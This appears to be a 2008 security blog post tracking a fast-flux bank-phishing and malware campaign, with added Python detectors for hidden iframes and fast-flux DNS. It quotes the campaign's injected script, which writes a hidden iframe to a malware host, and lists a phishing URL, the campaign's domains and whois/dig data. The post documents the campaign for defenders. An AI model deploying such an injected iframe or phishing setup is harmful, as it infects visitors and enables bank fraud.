Both .su and .ru domains are in use. The .su domains are the ones being heavily spammed for the bank phishing setup.
One example is h||p://ww3.associatedbank.com.app2. su/web_bank/confirm.asp
The "infection script" script.js now looks like this:
if (navigator.userAgent.indexOf('AntivirXP08') == -1) {
    // Only visitors whose User-Agent string lacks the 'AntivirXP08' marker get the payload:
    // a zero-size, borderless iframe pointing at the oc32.ru CGI, written into the page.
    document.write("<iframe src=h||p://oc32. ru/cgi-bin/index.cgi?script width=0 height=0 frameborder=0></iframe>");
}
There we have a connection to the malware again.
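As an added example (not code from the original post), the following Python scanner flags script bodies carrying the pattern shown above: a document.write() that emits an iframe with zero width and height, plus the navigator.userAgent gate. The sample script is constructed to mirror script.js, with the placeholder host example.invalid standing in for the real one; the regexes and the verdict rule are this example's own assumptions.

```python
import re

# Constructed sample: script.js as quoted above, with the real host replaced
# by the placeholder example.invalid (an assumption for this example).
SAMPLE_SCRIPT = r'''
if(navigator.userAgent.indexOf('AntivirXP08')==-1){
document.write("<iframe src=http://example.invalid/cgi-bin/index.cgi?script width=0 height=0 frameborder=0></iframe>");
}
'''

# document.write("<iframe ...>") : group 1 is the iframe's attribute string.
IFRAME_WRITE_RE = re.compile(r'document\.write\(\s*["\']\s*<iframe\b([^>]*)>', re.IGNORECASE)
# navigator.userAgent.indexOf('MARKER') == -1 : run only when MARKER is absent.
UA_GATE_RE = re.compile(r"""navigator\.userAgent\.indexOf\(\s*['"]([^'"]+)['"]\s*\)\s*==\s*-1""")
# src attribute, quoted or (as in the sample) bare.
SRC_RE = re.compile(r'\bsrc\s*=\s*["\']?([^\s"\'>]+)', re.IGNORECASE)


def _attr_is_zero(attrs, name):
    """True when the attribute (width/height) is set to 0 in the attribute string."""
    return re.search(r'\b%s\s*=\s*["\']?0\b' % name, attrs, re.IGNORECASE) is not None


def scan_script(text):
    """Return the iframes written from script and any User-Agent gate markers."""
    iframes = []
    for m in IFRAME_WRITE_RE.finditer(text):
        attrs = m.group(1)
        src = SRC_RE.search(attrs)
        iframes.append({
            'src': src.group(1) if src else None,
            'hidden': _attr_is_zero(attrs, 'width') and _attr_is_zero(attrs, 'height'),
        })
    return {'iframes': iframes, 'ua_gate_markers': UA_GATE_RE.findall(text)}


def is_injection(report):
    """Verdict (assumed rule): any zero-size iframe written from script counts as
    the injection pattern; the UA gate is reported alongside as supporting evidence."""
    return any(f['hidden'] for f in report['iframes'])


if __name__ == '__main__':
    rep = scan_script(SAMPLE_SCRIPT)
    print(rep)
    print('injection:', is_injection(rep))
```

The scanner is deliberately narrow: it matches the literal document.write form used here and will not catch the same payload built via createElement or string concatenation, so treat it as a signature for this campaign's variant rather than a general hidden-iframe detector.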
The "NESCO Accounting & Finance" mule scam is still served at the root level of the domains/IPs.
Domain list:
.su:
app2.su, app4.su, app7.su, cfm7.su, dll1.su, dll5.su, form2.su, form6.su, page7.su, sid3.su, sid8.su, ssl2.su
.ru:
2b24.ru, cg33.ru, cv2e.ru, cv32.ru, mc2n.ru, mj5f.ru, oc32.ru, vswc.ru
Example whois record and dig answer for app2.su (note the 14 A records with a 600 s TTL, all three nameservers inside the domain itself, and the registration date only days before the query):

domain:        APP2.SU
nserver:       ns1.app2.su. 70.154.82.100
nserver:       ns2.app2.su. 75.67.216.154
nserver:       ns3.app2.su. 142.137.20.137
state:         REGISTERED, DELEGATED
person:        Private Person
phone:         +7 495 1199111
fax-no:        +7 495 1199111
e-mail:        sdtttg@hotmail.com
registrar:     NAUNET-REG-FID
created:       2008.08.27
paid-till:     2009.08.27
source:        FID

; <<>> DiG 9.3.5-P1 <<>> app2.su
;; global options:  printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 35955
;; flags: qr rd ra; QUERY: 1, ANSWER: 14, AUTHORITY: 3, ADDITIONAL: 0

;; QUESTION SECTION:
;app2.su.                       IN      A

;; ANSWER SECTION:
app2.su.                600     IN      A       75.140.17.43
app2.su.                600     IN      A       76.122.164.201
app2.su.                600     IN      A       85.65.225.115
app2.su.                600     IN      A       85.69.73.56
app2.su.                600     IN      A       85.87.31.54
app2.su.                600     IN      A       88.2.47.117
app2.su.                600     IN      A       99.149.62.82
app2.su.                600     IN      A       121.96.235.152
app2.su.                600     IN      A       121.150.131.120
app2.su.                600     IN      A       123.192.188.75
app2.su.                600     IN      A       219.50.8.52
app2.su.                600     IN      A       12.214.195.151
app2.su.                600     IN      A       72.48.167.176
app2.su.                600     IN      A       75.64.193.157

;; AUTHORITY SECTION:
app2.su.                345600  IN      NS      ns3.app2.su.
app2.su.                345600  IN      NS      ns2.app2.su.
app2.su.                345600  IN      NS      ns1.app2.su.

;; Query time: 780 msec
;; SERVER: 217.13.7.140#53(217.13.7.140)
;; WHEN: Sat Aug 30 11:34:38 2008
;; MSG SIZE  rcvd: 303
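As an added example (not code from the original post), the Python below parses a dig answer of the kind shown above and scores the indicators a tracker would look at when deciding whether a domain is fast-flux hosted: how many A records it returns, how short the TTL is, how scattered the addresses are across /16 prefixes, and whether every nameserver sits inside the domain itself. The embedded sample is the app2.su answer from the post; the thresholds in looks_like_fast_flux are this example's own assumptions, not figures from the post.

```python
import re
from ipaddress import ip_address

# dig answer reproduced from the post (app2.su, queried Sat Aug 30 2008).
DIG_OUTPUT = """\
;; ANSWER SECTION:
app2.su.  600  IN  A  75.140.17.43
app2.su.  600  IN  A  76.122.164.201
app2.su.  600  IN  A  85.65.225.115
app2.su.  600  IN  A  85.69.73.56
app2.su.  600  IN  A  85.87.31.54
app2.su.  600  IN  A  88.2.47.117
app2.su.  600  IN  A  99.149.62.82
app2.su.  600  IN  A  121.96.235.152
app2.su.  600  IN  A  121.150.131.120
app2.su.  600  IN  A  123.192.188.75
app2.su.  600  IN  A  219.50.8.52
app2.su.  600  IN  A  12.214.195.151
app2.su.  600  IN  A  72.48.167.176
app2.su.  600  IN  A  75.64.193.157

;; AUTHORITY SECTION:
app2.su.  345600  IN  NS  ns3.app2.su.
app2.su.  345600  IN  NS  ns2.app2.su.
app2.su.  345600  IN  NS  ns1.app2.su.
"""

# owner  TTL  IN  TYPE  rdata  (only A and NS are of interest here)
RR_RE = re.compile(r'^(\S+)\s+(\d+)\s+IN\s+(A|NS)\s+(\S+)$')


def parse_dig(text):
    """Return (owner, ttl, type, rdata) tuples for the A and NS records in dig output."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(';'):      # comments and section headers
            continue
        m = RR_RE.match(line)
        if not m:
            continue
        owner, ttl, rtype, rdata = m.groups()
        if rtype == 'A':
            ip_address(rdata)                     # raises ValueError on malformed rdata
        records.append((owner.rstrip('.'), int(ttl), rtype, rdata.rstrip('.')))
    return records


def flux_indicators(records, domain):
    """Summarise the answer: record count, lowest TTL, /16 spread, nameserver bailiwick."""
    a_records = [r for r in records if r[2] == 'A']
    ns_records = [r for r in records if r[2] == 'NS']
    prefixes = {'.'.join(r[3].split('.')[:2]) for r in a_records}   # crude /16 buckets
    in_bailiwick = [r for r in ns_records if r[3] == domain or r[3].endswith('.' + domain)]
    return {
        'a_records': len(a_records),
        'min_ttl': min((r[1] for r in a_records), default=None),
        'distinct_16': len(prefixes),
        'ns_total': len(ns_records),
        'ns_in_bailiwick': len(in_bailiwick),
    }


def looks_like_fast_flux(ind, min_records=5, max_ttl=900, min_prefixes=5):
    """Verdict with reasons. Thresholds are assumptions chosen for this example."""
    reasons = []
    if ind['a_records'] >= min_records:
        reasons.append('%d A records in one answer' % ind['a_records'])
    if ind['min_ttl'] is not None and ind['min_ttl'] <= max_ttl:
        reasons.append('TTL %d s' % ind['min_ttl'])
    if ind['distinct_16'] >= min_prefixes:
        reasons.append('%d distinct /16 prefixes' % ind['distinct_16'])
    if ind['ns_total'] and ind['ns_in_bailiwick'] == ind['ns_total']:
        reasons.append('all %d nameservers inside the domain itself' % ind['ns_total'])
    return len(reasons) >= 3, reasons


if __name__ == '__main__':
    ind = flux_indicators(parse_dig(DIG_OUTPUT), 'app2.su')
    verdict, reasons = looks_like_fast_flux(ind)
    print(ind)
    print('fast-flux:', verdict, '-', '; '.join(reasons))
```

The /16 bucketing is a stand-in for an ASN lookup, which is the check you would really want: the point is that a legitimate load-balanced host returns a handful of addresses from one or two networks, while the answer above spreads 14 addresses across 14 unrelated prefixes with a 10-minute TTL. Running the same query again later and diffing the address set is the natural next step; this script only scores a single snapshot.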
Comments
spamples?
Hi -- thanks for tracking these.
Listen, if you have spam samples, could you post copies of those in full, too? It'd be useful for antispam rule development (I'm one of the SpamAssassin devs). Feel free to obfuscate spamtrap addrs of course...
Re: spamples?
Hi
I am a bit reluctant to post full samples of spam, for various reasons.
If anyone is especially interested in some spam in specific, contact me instead.